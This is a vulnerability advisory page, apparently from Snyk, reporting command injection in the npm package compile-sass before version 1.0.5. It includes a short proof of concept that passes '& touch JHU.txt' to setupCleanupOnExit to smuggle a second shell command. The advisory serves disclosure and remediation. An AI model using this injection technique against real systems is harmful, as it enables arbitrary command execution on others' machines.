compile-sass@0.1.4 vulnerabilities

A module to compile SASS on-the-fly and/or save it to CSS files

  • latest version

    2.0.0

  • latest non vulnerable version

  • first published

    6 years ago

  • latest version published

    2 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the compile-sass package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Command Injection

    compile-sass is a module to compile SASS on-the-fly and/or save it to CSS files.

    Affected versions of this package are vulnerable to Command Injection. The function setupCleanupOnExit(cssPath) within dist/index.js is executed as part of the rm command without any sanitization.

    PoC by JHU System Security Lab

    function sleep(millis) {
        return new Promise(resolve => setTimeout(resolve, millis));
    }
    async function main(){
        var a = require('compile-sass');
        a.setupCleanupOnExit('& touch JHU.txt');
        console.log('Press Ctrl-C in 3 seconds...')
        await sleep(3000);
    }
    main();
    

    How to fix Command Injection?

    Upgrade compile-sass to version 1.0.5 or higher.

    <1.0.5